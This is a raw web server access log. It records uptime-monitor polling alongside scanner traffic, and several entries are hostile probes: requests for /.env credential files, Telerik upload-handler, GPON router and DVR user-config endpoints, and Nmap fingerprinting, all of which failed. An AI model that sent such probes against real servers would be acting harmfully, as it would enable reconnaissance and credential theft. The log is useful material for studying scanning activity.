172.104.140.107 - - [06/Nov/2021:11:24:10 +0100] "GET /localstart.aspx HTTP/1.1" 404 320 "-" "curl/7.54.0"
172.104.140.107 - - [06/Nov/2021:11:24:10 +0100] "GET /base.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
172.104.140.107 - - [06/Nov/2021:11:24:10 +0100] "GET /localstart.jsa HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.140.107 - - [06/Nov/2021:11:24:10 +0100] "GET /home.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [06/Nov/2021:11:24:11 +0100] "GET /base.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [06/Nov/2021:11:24:11 +0100] "GET /start.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [06/Nov/2021:11:24:11 +0100] "GET /main.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [06/Nov/2021:11:24:11 +0100] "GET /base.inc HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [06/Nov/2021:11:24:11 +0100] "GET /base.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [06/Nov/2021:11:24:12 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
172.104.140.107 - - [06/Nov/2021:11:24:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
172.104.140.107 - - [06/Nov/2021:11:24:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:11:24:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:25:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.200.227 - - [06/Nov/2021:11:25:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
212.91.246.72 - - [06/Nov/2021:11:26:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:27:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:28:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:29:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:30:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:31:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.61.2 - - [06/Nov/2021:11:32:22 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
161.35.61.2 - - [06/Nov/2021:11:32:22 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [06/Nov/2021:11:32:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.97.146 - - [06/Nov/2021:11:32:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:33:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:34:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.165 - - [06/Nov/2021:11:34:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:35:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:36:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:37:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.110 - - [06/Nov/2021:11:38:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:38:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.110 - - [06/Nov/2021:11:38:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:38:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:39:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:39:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:39:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.165 - - [06/Nov/2021:11:39:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:39:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:39:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:40:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.110 - - [06/Nov/2021:11:41:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:41:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.110 - - [06/Nov/2021:11:41:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:42:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:42:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.157.46 - - [06/Nov/2021:11:42:54 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
192.241.157.46 - - [06/Nov/2021:11:42:54 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [06/Nov/2021:11:43:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.16.76.220 - - [06/Nov/2021:11:43:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
23.251.102.74 - - [06/Nov/2021:11:43:56 +0100] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:44:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.227.159.19 - - [06/Nov/2021:11:44:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
193.3.19.243 - - [06/Nov/2021:11:44:56 +0100] "\x03" 501 316 "-" "-"
185.53.90.110 - - [06/Nov/2021:11:45:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:45:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.110 - - [06/Nov/2021:11:45:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
180.149.125.169 - - [06/Nov/2021:11:46:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:46:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:46:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.110 - - [06/Nov/2021:11:46:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:46:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:46:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:46:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:47:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.110 - - [06/Nov/2021:11:47:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:47:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.53.90.110 - - [06/Nov/2021:11:48:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:48:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:49:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
67.205.186.154 - - [06/Nov/2021:11:50:19 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
67.205.186.154 - - [06/Nov/2021:11:50:20 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [06/Nov/2021:11:50:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:51:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:52:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.207.116.155 - - [06/Nov/2021:11:52:34 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
212.91.246.72 - - [06/Nov/2021:11:53:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:54:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:55:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.59.204.164 - - [06/Nov/2021:11:56:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:11:56:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:57:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:58:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:11:59:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.44 - - [06/Nov/2021:11:59:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.44 - - [06/Nov/2021:11:59:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [06/Nov/2021:12:00:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:01:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:02:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:03:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:04:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.3.19.243 - - [06/Nov/2021:12:04:30 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [06/Nov/2021:12:05:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
115.49.24.54 - - [06/Nov/2021:12:06:21 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [06/Nov/2021:12:06:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.1.248.42 - - [06/Nov/2021:12:06:57 +0100] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:12:07:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:08:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.3.19.243 - - [06/Nov/2021:12:08:30 +0100] "\x03" 501 316 "-" "-"
142.93.97.146 - - [06/Nov/2021:12:08:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
120.220.9.194 - - [06/Nov/2021:12:09:21 +0100] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
212.91.246.72 - - [06/Nov/2021:12:09:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.220.9.194 - - [06/Nov/2021:12:09:38 +0100] "GET /__Additional HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
120.220.9.194 - - [06/Nov/2021:12:09:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
186.33.95.192 - - [06/Nov/2021:12:09:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
120.220.9.194 - - [06/Nov/2021:12:09:57 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
123.207.116.155 - - [06/Nov/2021:12:10:03 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
123.207.116.155 - - [06/Nov/2021:12:10:11 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:12:10:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:11:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:12:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:13:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:14:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:15:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.177.43.37 - - [06/Nov/2021:12:15:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:12:16:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:17:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.134.170 - - [06/Nov/2021:12:17:52 +0100] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:12:18:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.210.44.255 - - [06/Nov/2021:12:18:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
186.33.92.119 - - [06/Nov/2021:12:19:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
186.33.92.119 - - [06/Nov/2021:12:19:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:12:19:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:20:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:21:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.168 - - [06/Nov/2021:12:22:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:12:25:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
186.33.79.148 - - [06/Nov/2021:12:25:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:12:26:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:27:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:28:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:29:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:30:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.167 - - [06/Nov/2021:12:30:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
209.141.62.185 - - [06/Nov/2021:12:31:01 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [06/Nov/2021:12:31:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:32:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:33:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:34:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:35:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:36:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:37:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:38:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:39:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:40:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
218.85.135.250 - - [06/Nov/2021:12:40:23 +0100] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
218.85.135.250 - - [06/Nov/2021:12:40:24 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
218.85.135.250 - - [06/Nov/2021:12:40:25 +0100] "GET /__Additional HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
218.85.135.250 - - [06/Nov/2021:12:40:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
212.91.246.72 - - [06/Nov/2021:12:41:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:42:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
